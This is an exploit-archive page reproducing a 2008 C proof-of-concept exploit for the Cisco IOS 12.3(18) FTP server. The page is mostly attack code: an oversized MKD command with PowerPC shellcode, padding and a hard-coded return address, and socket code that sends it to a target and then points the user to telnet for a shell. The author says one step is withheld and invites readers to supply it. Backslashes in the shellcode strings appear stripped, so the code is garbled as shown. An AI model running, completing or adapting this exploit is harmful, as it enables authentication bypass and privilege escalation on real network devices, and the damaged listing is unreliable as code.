Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
# Published : 2008-07-29
# Author : Andy Davis
# Previous Title : BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)
# Next Title : Velocity web-server 1.0 Directory Traversal File Download Vulnerability

/*

 Cisco IOS FTP server remote exploit by Andy Davis 2008               
                                                                      
 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007               
                                                                      
 Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router    
                                                                      
 Removes the requirement to authenticate and escalates to level 15    
                                                                      
 *********************************************************************
 To protect the innocent a critical step has been omitted, which means
 the shellcode will only execute when the router is attached to gdb.  
 I'm sure the PowerPC shellcoders out there will work it out...       
 *********************************************************************
                                                                      
 Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
 on the original IOS security research                                
                                                                      
 iosftpexploit <at> googlemail 'dot' com                              

*/

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>

#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60    # pointer to VTY info */
/* .equ terminate, 0x80e4086c   # kill a process */

"x3cx80x81x83"      /* lis     4,vty_info@ha */
"x38x84xdax60"      /* la      4,vty_info@l(4) */
"x7dx08x42x78"      /* xor     8,8,8 */
"x7cxe4x40x2e"      /* lwzx    7,4,8 */
"x91x07x01x74"      /* stw     8,372(7) */
"x39x08xffxff"      /* subi    8,8,1 */
"x38xe7x09x1a"      /* addi    7,7,233 */
"x91x07x04xca"      /* stw     8,1226(7) */
"x7dx03x43x78"      /* mr      3,8 */
"x3cx80x80xe4"      /* lis     4,terminate@ha */
"x38x84x08x6c"      /* la      4,terminate@l(4) */
"x7cx89x03xa6"      /* mtctr   4 */
"x4ex80x04x20"      /* bctr    */

/* exists cleanly without adversely affecting the FTP server */

"x61x61x61x61"      /* padding */
"x61x61x61x61"      /* padding */
"x61x61x61x61"      /* padding */
"x61x61x61x61"      /* padding */
"x61x61x61x61"      /* padding */
"x61x61x61x61"      /* padding */

"x80x06x23xB8"      /* return address */
"x0dx0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8      lwz     26, 20(26)
0x800623BC      mtctr   26
0x800623C0      mr      3, 27
0x800623C4      bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
        {
        printf ("nCisco IOS FTP server remote exploit by Andy Davis 2008n");

        printf ("nUsage: %s <target IP address>n",argv[0]);
        exit(-1);
        }

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("nCisco IOS FTP server remote exploit by Andy Davis 2008n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM routernn");
printf ("Sending exploit...nn");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
        {
        printf("Error sending packet...quittingnn");
        exit (1);
        }
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...nn");
}

// www.Syue.com [2008-07-29]